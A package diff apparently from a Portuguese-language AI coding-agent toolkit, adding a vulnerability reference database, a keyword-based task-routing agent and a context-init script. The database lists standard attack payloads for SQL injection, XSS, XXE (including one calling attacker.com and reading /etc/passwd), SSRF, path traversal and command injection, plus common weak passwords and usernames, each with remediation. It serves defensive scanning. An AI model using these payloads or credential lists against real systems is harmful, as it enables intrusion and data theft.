wegho-agentes 4.0.1

package/.agents/security/vulnerability-db.json

@@ -0,0 +1,201 @@
+{
+    "sql_injection": {
+        "severity": "CRITICAL",
+        "owasp_id": "A03:2021",
+        "category": "Injection",
+        "description": "SQL Injection permite que atacantes executem comandos SQL arbitrários no banco de dados",
+        "payloads": [
+            "' OR '1'='1",
+            "'; DROP TABLE users--",
+            "' UNION SELECT NULL--",
+            "admin' --",
+            "' OR 1=1--",
+            "1' AND '1'='1",
+            "' UNION SELECT username, password FROM users--",
+            "'; EXEC sp_MSForEachTable 'DROP TABLE ?'--"
+        ],
+        "detection_patterns": [
+            "SQL syntax error",
+            "mysql_fetch",
+            "ORA-01756",
+            "Microsoft SQL Native Client error",
+            "Unclosed quotation mark"
+        ],
+        "remediation": "Use prepared statements, parameterized queries, ORM frameworks, input validation",
+        "impact": "Data breach, data manipulation, authentication bypass, complete system compromise"
+    },
+    "xss": {
+        "severity": "HIGH",
+        "owasp_id": "A03:2021",
+        "category": "Injection",
+        "description": "Cross-Site Scripting permite injeção de scripts maliciosos em páginas web",
+        "types": [
+            "reflected",
+            "stored",
+            "dom-based"
+        ],
+        "payloads": [
+            "<script>alert('XSS')</script>",
+            "<img src=x onerror=alert('XSS')>",
+            "javascript:alert('XSS')",
+            "<svg onload=alert('XSS')>",
+            "'-alert('XSS')-'",
+            "<iframe src='javascript:alert(1)'>",
+            "<body onload=alert('XSS')>",
+            "<input onfocus=alert('XSS') autofocus>"
+        ],
+        "detection": "Script execution in browser, DOM manipulation, cookie theft",
+        "remediation": "Sanitize inputs with DOMPurify, implement Content Security Policy, encode outputs, use frameworks with auto-escaping",
+        "impact": "Session hijacking, credential theft, malware distribution, phishing"
+    },
+    "csrf": {
+        "severity": "HIGH",
+        "owasp_id": "A01:2021",
+        "category": "Broken Access Control",
+        "description": "Cross-Site Request Forgery força usuários autenticados a executar ações não intencionais",
+        "detection_methods": [
+            "Missing CSRF tokens",
+            "Predictable CSRF tokens",
+            "CSRF token not validated",
+            "GET requests for state-changing operations"
+        ],
+        "remediation": "Implement anti-CSRF tokens, use SameSite cookies, validate Referer header, require re-authentication for sensitive actions",
+        "impact": "Unauthorized actions, data modification, account takeover"
+    },
+    "weak_passwords": {
+        "severity": "CRITICAL",
+        "owasp_id": "A07:2021",
+        "category": "Identification and Authentication Failures",
+        "description": "Senhas fracas facilitam ataques de brute force e credential stuffing",
+        "common_passwords": [
+            "123456",
+            "password",
+            "123456789",
+            "12345678",
+            "12345",
+            "1234567",
+            "admin",
+            "123123",
+            "qwerty",
+            "abc123",
+            "password123",
+            "admin123",
+            "root",
+            "toor",
+            "pass"
+        ],
+        "common_usernames": [
+            "admin",
+            "administrator",
+            "root",
+            "user",
+            "test",
+            "guest",
+            "demo",
+            "webmaster",
+            "support"
+        ],
+        "detection": "Successful login with weak credentials, no password complexity requirements",
+        "remediation": "Enforce strong password policy (min 12 chars, complexity), implement rate limiting, use MFA, password strength meter, breach detection",
+        "impact": "Account compromise, unauthorized access, data breach"
+    },
+    "session_hijacking": {
+        "severity": "CRITICAL",
+        "owasp_id": "A07:2021",
+        "category": "Identification and Authentication Failures",
+        "description": "Roubo ou predição de IDs de sessão para impersonar usuários",
+        "attack_vectors": [
+            "Session fixation",
+            "Session prediction",
+            "Session sniffing",
+            "XSS-based session theft"
+        ],
+        "detection": "Predictable session IDs, session ID in URL, no session regeneration after login",
+        "remediation": "Regenerate session ID after login, use secure and httpOnly cookies, implement session timeout, use HTTPS only",
+        "impact": "Account takeover, unauthorized access, identity theft"
+    },
+    "insecure_headers": {
+        "severity": "MEDIUM",
+        "owasp_id": "A05:2021",
+        "category": "Security Misconfiguration",
+        "description": "Falta de headers de segurança HTTP expõe aplicação a diversos ataques",
+        "required_headers": {
+            "X-Frame-Options": "DENY or SAMEORIGIN",
+            "X-Content-Type-Options": "nosniff",
+            "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
+            "Content-Security-Policy": "default-src 'self'",
+            "X-XSS-Protection": "1; mode=block",
+            "Referrer-Policy": "no-referrer-when-downgrade"
+        },
+        "remediation": "Configure all security headers properly, use helmet.js for Node.js, implement CSP",
+        "impact": "Clickjacking, MIME sniffing attacks, man-in-the-middle attacks"
+    },
+    "xxe": {
+        "severity": "CRITICAL",
+        "owasp_id": "A05:2021",
+        "category": "Security Misconfiguration",
+        "description": "XML External Entity injection permite leitura de arquivos e SSRF",
+        "payloads": [
+            "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
+            "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://attacker.com/evil\">]><foo>&xxe;</foo>"
+        ],
+        "detection": "File disclosure, SSRF, denial of service",
+        "remediation": "Disable XML external entities, use JSON instead of XML, validate and sanitize XML input",
+        "impact": "File disclosure, SSRF, denial of service, remote code execution"
+    },
+    "insecure_deserialization": {
+        "severity": "CRITICAL",
+        "owasp_id": "A08:2021",
+        "category": "Software and Data Integrity Failures",
+        "description": "Desserialização insegura pode levar a execução remota de código",
+        "detection": "Untrusted data deserialization, base64 encoded objects",
+        "remediation": "Avoid deserializing untrusted data, implement integrity checks, use safe serialization formats like JSON",
+        "impact": "Remote code execution, privilege escalation, data tampering"
+    },
+    "ssrf": {
+        "severity": "HIGH",
+        "owasp_id": "A10:2021",
+        "category": "Server-Side Request Forgery",
+        "description": "SSRF permite que atacantes façam requisições a partir do servidor",
+        "payloads": [
+            "http://localhost:8080/admin",
+            "http://169.254.169.254/latest/meta-data/",
+            "file:///etc/passwd",
+            "http://internal-server/"
+        ],
+        "detection": "Server making unexpected outbound requests, access to internal resources",
+        "remediation": "Validate and sanitize URLs, use allowlist of domains, disable unnecessary protocols, implement network segmentation",
+        "impact": "Access to internal systems, cloud metadata exposure, port scanning"
+    },
+    "path_traversal": {
+        "severity": "HIGH",
+        "owasp_id": "A01:2021",
+        "category": "Broken Access Control",
+        "description": "Path traversal permite acesso a arquivos fora do diretório pretendido",
+        "payloads": [
+            "../../../etc/passwd",
+            "..\\..\\..\\windows\\system32\\config\\sam",
+            "....//....//....//etc/passwd",
+            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+        ],
+        "detection": "Unauthorized file access, directory listing",
+        "remediation": "Validate file paths, use chroot jail, implement proper access controls, avoid user input in file paths",
+        "impact": "Sensitive file disclosure, configuration file access, source code exposure"
+    },
+    "command_injection": {
+        "severity": "CRITICAL",
+        "owasp_id": "A03:2021",
+        "category": "Injection",
+        "description": "Command injection permite execução de comandos arbitrários no sistema operacional",
+        "payloads": [
+            "; ls -la",
+            "| cat /etc/passwd",
+            "& whoami",
+            "`id`",
+            "$(cat /etc/passwd)"
+        ],
+        "detection": "Unexpected command execution, system command output in response",
+        "remediation": "Avoid system calls with user input, use parameterized APIs, implement input validation, use safe libraries",
+        "impact": "Complete system compromise, data breach, malware installation"
+    }
+}

package/.agents/task-analyzer-agent.ts

@@ -0,0 +1,346 @@
+/**
+ * Task Analyzer Agent
+ * 
+ * Responsabilidades:
+ * - Analisar tarefa ANTES de executar
+ * - Decidir quais agentes usar
+ * - Criar plano de execução com subtarefas
+ * - Sugerir pesquisas em repositórios/docs quando necessário
+ */
+
+import { AgentConfig } from './config';
+
+export interface TaskAnalysis {
+    taskDescription: string;
+    detectedAreas: string[]; // ['frontend', 'security', 'database', 'api']
+    requiredAgents: string[]; // ['frontend-agent', 'security-agent', 'db-security-agent']
+    agentAssignments: AgentAssignment[];
+    suggestedResearch: ResearchSuggestion[];
+    complexity: 'low' | 'medium' | 'high';
+}
+
+export interface AgentAssignment {
+    agentName: string;
+    subtask: string;
+    priority: number; // 1 = executar primeiro
+    dependencies: string[]; // outros agentes que devem executar antes
+}
+
+export interface ResearchSuggestion {
+    topic: string;
+    sources: string[]; // ['supabase-docs', 'react-docs', 'github:example/repo']
+    reason: string;
+}
+
+export class TaskAnalyzerAgent {
+    /**
+     * Analisa a tarefa e retorna plano de execução
+     */
+    async analyzeTask(taskDescription: string, config: AgentConfig): Promise<TaskAnalysis> {
+        console.log('\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━');
+        console.log('🧠 ANÁLISE INTELIGENTE DA TAREFA');
+        console.log('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n');
+
+        console.log(`📋 Tarefa: ${taskDescription}\n`);
+
+        // Detectar áreas envolvidas
+        const detectedAreas = this.detectAreas(taskDescription);
+        console.log('🎯 Áreas detectadas:');
+        detectedAreas.forEach(area => console.log(`  - ${area}`));
+        console.log('');
+
+        // Determinar agentes necessários
+        const requiredAgents = this.determineRequiredAgents(detectedAreas, taskDescription);
+        console.log('🤖 Agentes necessários:');
+        requiredAgents.forEach(agent => console.log(`  - ${agent}`));
+        console.log('');
+
+        // Criar assignments (subtarefas)
+        const agentAssignments = this.createAgentAssignments(requiredAgents, taskDescription, detectedAreas);
+        console.log('📌 Designação de tarefas:');
+        agentAssignments.forEach(assignment => {
+            console.log(`  ${assignment.priority}. ${assignment.agentName}:`);
+            console.log(`     → ${assignment.subtask}`);
+            if (assignment.dependencies.length > 0) {
+                console.log(`     ⚠️  Depende de: ${assignment.dependencies.join(', ')}`);
+            }
+        });
+        console.log('');
+
+        // Sugerir pesquisas
+        const suggestedResearch = this.suggestResearch(detectedAreas, taskDescription);
+        if (suggestedResearch.length > 0) {
+            console.log('🔍 Pesquisas sugeridas:');
+            suggestedResearch.forEach(suggestion => {
+                console.log(`  📚 ${suggestion.topic}`);
+                console.log(`     Fontes: ${suggestion.sources.join(', ')}`);
+                console.log(`     Por quê: ${suggestion.reason}\n`);
+            });
+        }
+
+        // Determinar complexidade
+        const complexity = this.estimateComplexity(detectedAreas, requiredAgents);
+        console.log(`⚖️  Complexidade: ${complexity.toUpperCase()}\n`);
+
+        console.log('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n');
+
+        return {
+            taskDescription,
+            detectedAreas,
+            requiredAgents,
+            agentAssignments,
+            suggestedResearch,
+            complexity,
+        };
+    }
+
+    /**
+     * Detecta áreas envolvidas na tarefa por palavras-chave
+     */
+    private detectAreas(taskDescription: string): string[] {
+        const areas: string[] = [];
+        const desc = taskDescription.toLowerCase();
+
+        // Frontend
+        if (desc.match(/component|ui|interface|página|layout|css|estilo|responsiv/i)) {
+            areas.push('frontend');
+        }
+
+        // Backend/API
+        if (desc.match(/api|endpoint|rota|servidor|backend|função/i)) {
+            areas.push('backend');
+        }
+
+        // Database
+        if (desc.match(/database|banco|tabela|query|sql|migration|rls|policy|supabase/i)) {
+            areas.push('database');
+        }
+
+        // Auth
+        if (desc.match(/auth|login|logout|session|usuário|permiss|role/i)) {
+            areas.push('auth');
+        }
+
+        // Security
+        if (desc.match(/segur|vulnerab|xss|csrf|sanitiz|validação/i)) {
+            areas.push('security');
+        }
+
+        // Performance
+        if (desc.match(/performance|otimiz|cache|lazy|bundle|speed/i)) {
+            areas.push('performance');
+        }
+
+        // Testing
+        if (desc.match(/test|qa|validar|verificar/i)) {
+            areas.push('testing');
+        }
+
+        // Documentation
+        if (desc.match(/doc|readme|comentário|explain/i)) {
+            areas.push('documentation');
+        }
+
+        return areas.length > 0 ? areas : ['generic'];
+    }
+
+    /**
+     * Determina quais agentes usar baseado nas áreas
+     */
+    private determineRequiredAgents(areas: string[], taskDescription: string): string[] {
+        const agents = new Set<string>();
+
+        // Agentes core (sempre incluir alguns)
+        agents.add('architecture-agent'); // Sempre valida estrutura
+        agents.add('quality-agent'); // Sempre valida ao final
+
+        // Agentes específicos por área
+        if (areas.includes('frontend')) {
+            agents.add('frontend-agent');
+        }
+
+        if (areas.includes('security') || areas.includes('auth')) {
+            agents.add('security-agent');
+        }
+
+        if (areas.includes('database')) {
+            agents.add('database-security-agent');
+        }
+
+        if (areas.includes('documentation')) {
+            agents.add('documentation-agent');
+        }
+
+        // Agentes de domínio (baseado em palavras-chave)
+        if (taskDescription.match(/artigo|post|cms|seo/i)) {
+            agents.add('cms-agent');
+            agents.add('seo-agent');
+        }
+
+        if (taskDescription.match(/produção|plant|evento/i)) {
+            agents.add('production-control-agent');
+        }
+
+        if (taskDescription.match(/rota|entrega|logística/i)) {
+            agents.add('route-agent');
+        }
+
+        return Array.from(agents);
+    }
+
+    /**
+     * Cria designações específicas para cada agente
+     */
+    private createAgentAssignments(
+        agents: string[],
+        taskDescription: string,
+        areas: string[]
+    ): AgentAssignment[] {
+        const assignments: AgentAssignment[] = [];
+
+        // Exemplo de subtarefas específicas
+        if (agents.includes('architecture-agent')) {
+            assignments.push({
+                agentName: 'architecture-agent',
+                subtask: 'Validar estrutura de arquivos e garantir limite 500 linhas',
+                priority: 1,
+                dependencies: [],
+            });
+        }
+
+        if (agents.includes('frontend-agent')) {
+            assignments.push({
+                agentName: 'frontend-agent',
+                subtask: 'Validar componentes React, acessibilidade e UI/UX',
+                priority: 2,
+                dependencies: ['architecture-agent'],
+            });
+        }
+
+        if (agents.includes('security-agent')) {
+            assignments.push({
+                agentName: 'security-agent',
+                subtask: 'Detectar vulnerabilidades (XSS, CSRF, dados sensíveis)',
+                priority: 2,
+                dependencies: ['architecture-agent'],
+            });
+        }
+
+        if (agents.includes('database-security-agent')) {
+            assignments.push({
+                agentName: 'database-security-agent',
+                subtask: 'Validar RLS policies e estrutura de tabelas Supabase',
+                priority: 3,
+                dependencies: ['architecture-agent'],
+            });
+        }
+
+        if (agents.includes('documentation-agent')) {
+            assignments.push({
+                agentName: 'documentation-agent',
+                subtask: 'Gerar/atualizar documentação automática',
+                priority: 4,
+                dependencies: ['frontend-agent', 'security-agent'],
+            });
+        }
+
+        if (agents.includes('quality-agent')) {
+            assignments.push({
+                agentName: 'quality-agent',
+                subtask: 'Executar lint, typecheck, build e dar GO/NO-GO final',
+                priority: 5,
+                dependencies: Array.from(
+                    new Set(agents.filter(a => a !== 'quality-agent'))
+                ),
+            });
+        }
+
+        // Agentes de domínio
+        if (agents.includes('cms-agent')) {
+            assignments.push({
+                agentName: 'cms-agent',
+                subtask: 'Validar estrutura de artigos/posts e campos obrigatórios',
+                priority: 2,
+                dependencies: ['architecture-agent'],
+            });
+        }
+
+        if (agents.includes('seo-agent')) {
+            assignments.push({
+                agentName: 'seo-agent',
+                subtask: 'Validar meta tags, structured data e sitemap',
+                priority: 3,
+                dependencies: ['frontend-agent'],
+            });
+        }
+
+        return assignments.sort((a, b) => a.priority - b.priority);
+    }
+
+    /**
+     * Sugere pesquisas em repositórios/docs
+     */
+    private suggestResearch(areas: string[], taskDescription: string): ResearchSuggestion[] {
+        const suggestions: ResearchSuggestion[] = [];
+
+        if (areas.includes('database')) {
+            suggestions.push({
+                topic: 'Supabase Row Level Security (RLS)',
+                sources: ['supabase-docs', 'https://supabase.com/docs/guides/auth/row-level-security'],
+                reason: 'Tarefa envolve banco de dados, verificar best practices de RLS',
+            });
+        }
+
+        if (areas.includes('frontend')) {
+            suggestions.push({
+                topic: 'Next.js App Router Best Practices',
+                sources: ['nextjs-docs', 'https://nextjs.org/docs/app'],
+                reason: 'Garantir uso correto de Server/Client Components',
+            });
+        }
+
+        if (areas.includes('security')) {
+            suggestions.push({
+                topic: 'OWASP Top 10',
+                sources: ['owasp-docs', 'https://owasp.org/www-project-top-ten/'],
+                reason: 'Tarefa envolve segurança, revisar vulnerabilidades comuns',
+            });
+        }
+
+        if (areas.includes('performance')) {
+            suggestions.push({
+                topic: 'React Performance Optimization',
+                sources: ['react-docs', 'https://react.dev/learn/render-and-commit'],
+                reason: 'Otimizar renders e performance do React',
+            });
+        }
+
+        if (taskDescription.match(/typescript|type|interface/i)) {
+            suggestions.push({
+                topic: 'TypeScript Advanced Types',
+                sources: ['typescript-docs', 'https://www.typescriptlang.org/docs/handbook/2/types-from-types.html'],
+                reason: 'Garantir tipagem forte sem uso de "any"',
+            });
+        }
+
+        return suggestions;
+    }
+
+    /**
+     * Estima complexidade da tarefa
+     */
+    private estimateComplexity(areas: string[], agents: string[]): 'low' | 'medium' | 'high' {
+        const areaCount = areas.length;
+        const agentCount = agents.length;
+
+        if (areaCount <= 2 && agentCount <= 3) {
+            return 'low';
+        }
+
+        if (areaCount <= 4 && agentCount <= 5) {
+            return 'medium';
+        }
+
+        return 'high';
+    }
+}

package/.agents/test-init-context.js

@@ -0,0 +1,67 @@
+#!/usr/bin/env node
+
+/**
+ * Script Atualizado: Iniciar Contexto Interativo
+ * 
+ * Agora com descoberta de projeto e criação dinâmica de agentes!
+ * 
+ * Uso:
+ *   node .agents/test-init-context.js
+ *   ou
+ *   npm run agents:init
+ */
+
+const { initializeContext, printContextSummary } = require('./context-loader');
+
+async function main() {
+    console.log('');
+    console.log('🤖 SISTEMA DE AGENTES WEBGHO - v2.0');
+    console.log('Agora com descoberta interativa de projetos!');
+    console.log('');
+
+    try {
+        // Carregar contexto (com modo interativo)
+        const context = await initializeContext(true);
+
+        // Exibir resumo
+        if (typeof printContextSummary === 'function') {
+            printContextSummary(context);
+        }
+
+        // Validar se carregou corretamente
+        const hasDesignSystem = context.designSystem && context.designSystem.length > 0;
+        const hasSymbolsTree = context.symbolsTree && context.symbolsTree.length > 0;
+        const hasBuildHistory = context.buildHistory && context.buildHistory.length > 0;
+        const hasAgentRules = context.agentRules && context.agentRules.length > 0;
+
+        console.log('🧪 Resultados dos Testes:');
+        console.log(`  DESIGN_SYSTEM.md: ${hasDesignSystem ? '✅ OK' : '⚠️  SERÁ CRIADO'}`);
+        console.log(`  SYMBOLS_TREE.md: ${hasSymbolsTree ? '✅ OK' : '⚠️  SERÁ CRIADO'}`);
+        console.log(`  BUILD_HISTORY.md: ${hasBuildHistory ? '✅ OK' : '⚠️  SERÁ CRIADO'}`);
+        console.log(`  AGENT_RULES.md: ${hasAgentRules ? '✅ OK' : '⚠️  SERÁ CRIADO'}`);
+        console.log(`  Domínio detectado: ${context.domainConfig.name} (${context.domainConfig.description})`);
+
+        if (context.projectProfile) {
+            console.log(`  Perfil do Projeto: ✅ ${context.projectProfile.projectName}`);
+        }
+        console.log('');
+
+        console.log('🎉 SUCESSO: Sistema de contexto funcionando perfeitamente!');
+        console.log('');
+        console.log('📌 Próximos passos:');
+        console.log('  1. Revise o relatório acima');
+        console.log('  2. Os agentes recomendados serão criados automaticamente');
+        console.log('  3. Comece a implementar suas features com confiança!');
+        console.log('');
+        process.exit(0);
+
+    } catch (error) {
+        console.error('');
+        console.error('❌ ERRO ao inicializar contexto:');
+        console.error(error);
+        console.error('');
+        process.exit(1);
+    }
+}
+
+main();